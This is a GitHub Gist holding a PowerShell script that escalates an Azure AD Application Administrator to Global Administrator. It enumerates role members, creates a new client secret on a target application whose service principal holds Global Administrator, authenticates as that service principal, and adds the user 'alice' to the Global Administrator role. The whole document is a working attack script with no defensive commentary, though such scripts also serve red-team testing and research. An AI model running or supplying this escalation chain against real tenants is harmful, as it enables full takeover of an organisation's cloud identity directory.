Created
October 2, 2023 20:01
-
-
Save joshfinley/4e788fb2328ba0e391f47f875365d74b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Authenticate to Azure AD as an Application Administrator user | |
| $username = "alice" # Username for authentication | |
| $password = "asdf" # Password for authentication | |
| # Convert password to a secure string | |
| $securePass = ConvertTo-SecureString "$password" -AsPlainText -Force | |
| # Create a credential object | |
| $cred = New-Object System.Management.Automation.PSCredential($username, $securePass) | |
| # Connect to Azure AD with the provided credentials | |
| Connect-AzureAd -Credential $cred | |
| # Fetch and display roles and their members | |
| # Create an array to hold user role information | |
| $userRoles = @() | |
| # Fetch all directory roles | |
| Get-AzureADDirectoryRole | ForEach-Object { | |
| $Role = $_ # Current role | |
| # Fetch all members of the current role | |
| $RoleMembers = Get-AzureADDirectoryRoleMember -ObjectID $Role.ObjectId | |
| ForEach ($Member in $RoleMembers) { | |
| # Create custom object to hold role and member info | |
| $RoleMembership = [PSCustomObject]@{ | |
| MemberName = $Member.DisplayName | |
| MemberID = $Member.ObjectId | |
| MemberOnPremID = $Member.OnPremisesSecurityIdentifier | |
| MemberUPN = $Member.UserPrincipalName | |
| MemberType = $Member.ObjectType | |
| RoleID = $Role.RoleTemplateId | |
| } | |
| # Add this object to the userRoles array | |
| $userRoles += $RoleMembership | |
| } | |
| } | |
| # Fetch a specific user by userPrincipalName | |
| Get-AzureADUser -Filter "userPrincipalName eq '[email protected]'" | |
| # Filter roles by a specific Member ID | |
| $userRoles | Where-Object {$_.MemberID -match 'a29ddc45-1520-4b0a-b376-48a89e4f4d38'} | |
| # Fetch Application Administrator role details | |
| $AppAdminOid = Get-AzureADDirectoryRole | Where-Object {$_.DisplayName -eq 'Application Administrator'} | Select-Object -ExpandProperty ObjectId | |
| # Your target application's object ID should be set here | |
| $targetAppOid = "<Your Target Application's Object ID>" | |
| # Fetch the owners of the target application | |
| Get-AzureADApplicationOwner -ObjectId $targetAppOid | |
| # Fetch roles for the target application | |
| $userRoles | Where-Object {$_.MemberID -match $targetAppOid} | |
| # Fetch Global Administrator role object ID | |
| $ServicePrincipalAdRoleOid = Get-AzureADDirectoryRole | Where-Object {$_.DisplayName -eq 'Global Administrator'} | Select-Object -ExpandProperty ObjectId | |
| # Fetch members of Global Administrator role | |
| Get-AzureADDirectoryRoleMember -ObjectId $ServicePrincipalAdRoleOid | Select-Object ObjectId, DisplayName | |
| # Create and retrieve a new secret for the target application | |
| $AppKeyCred = New-AzureADApplicationPasswordCredential -ObjectId $targetAppOid | |
| $AppKeyCred.Value | |
| # Disconnect from Azure AD | |
| Disconnect-AzureAd | |
| # Variables for GA Service Principal authentication (Please set $tenantId) | |
| $azureApplicationId = $targetAppOid | |
| $azureTenantId = $tenantId | |
| $azurePassword = ConvertTo-SecureString $AppKeyCred.Value -AsPlainText -Force | |
| $psCred = New-Object System.Management.Automation.PSCredential($azureApplicationId, $azurePassword) | |
| # Connect to Azure with service principal credentials | |
| Connect-AzAccount -Credential $psCred -TenantId $azureTenantId -ServicePrincipal | |
| # Fetch authentication token for further operations | |
| $context = [Microsoft.Azure.Commands.Common.Authentication.Abstractions.AzureRmProfileProvider]::Instance.Profile.DefaultContext | |
| $aadToken = [Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate($context.Account, $context.Environment, $context.Tenant.Id.ToString(), $null, [Microsoft.Azure.Commands.Common.Authentication.ShowDialog]::Never, $null, "https://graph.windows.net").AccessToken | |
| # Connect to Azure AD using the obtained token | |
| Connect-AzureAd -AadAccessToken $aadToken -AccountId $context.Account.Id -TenantId $context.Tenant.Id | |
| # List Azure AD users | |
| Get-AzureADUser | |
| # Fetch Global Administrator role's object ID | |
| $GaRoleOid = Get-AzureADDirectoryRole | Where-Object {$_.DisplayName -eq 'Global Administrator'} | Select-Object -ExpandProperty ObjectId | |
| # Fetch members of the Global Administrator role | |
| Get-AzureADDirectoryRoleMember -ObjectId $GaRoleOid | Select-Object ObjectId, DisplayName | |
| # Fetch a specific user by DisplayName (alice in this case) | |
| $aliceOid = (Get-AzureADUser | Where-Object {$_.DisplayName -eq 'alice'}).ObjectId | |
| # Add the user to the Global Administrator role | |
| Add-AzureADDirectoryRoleMember -RefObjectId $aliceOid -ObjectId $GaRoleOid |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment